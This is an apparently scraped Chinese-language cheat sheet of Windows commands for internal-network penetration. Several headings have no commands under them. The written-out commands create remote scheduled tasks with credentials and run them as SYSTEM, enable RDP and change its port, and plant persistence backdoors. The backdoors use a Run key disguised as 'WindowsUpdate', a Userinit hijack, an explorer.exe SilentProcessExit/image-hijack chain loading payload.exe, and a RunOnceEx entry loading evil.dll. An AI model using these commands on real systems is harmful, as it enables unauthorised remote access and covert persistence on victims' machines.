attrib/sc/at/schtasks/reg
attrib,sc,at,schtasks,reg都属于windows常见命令,在内网渗透中或多或少都有一定的作用
attrib
隐藏文件
显示隐藏文件‘
sc
创建服务
设置服务启动模式
删除指定服务
查询已安装的服务
at
at属于计划任务的一种,at命令是基于net use之上的,因此必须存在net use的远程连接,才能正常使用net use命令,目前at命令已被弃用
查看计划任务列表
添加计划任务
删除计划任务
schtasks
schtasks是计划任务命令,用于替代at命令
创建远程主机的计划任务
schtasks /create /s ip /u [domain\]username /p "password" /tn task_name /sc onstart /tr "cmd.exe /c ipconfig /all > C:\1.txt" /ru system /f
创建本地计划任务
查询远程主机的计划任务
运行计划任务
删除计划任务
reg
查看远程桌面是否开启,0表示开启,1表示关闭
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
查看远程桌面的端口号
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
开启远程桌面
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
添加开机自启后门
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\Windows\Temp\payload.exe" /f
删除开机自启后门
添加userinit注册表后门
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\System32\userinit.exe,powershell代码" /f
删除userinit注册表后门
添加Logon Scripts后门
删除Logon Scripts后门
映像劫持后门
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\explorer.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\explorer.exe" /v MonitorProcess /d "C:\Users\Administrator\Desktop\payload.exe"
添加RunOnceEx后门
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Windows\Temp\evil.dll"
添加自启目录后门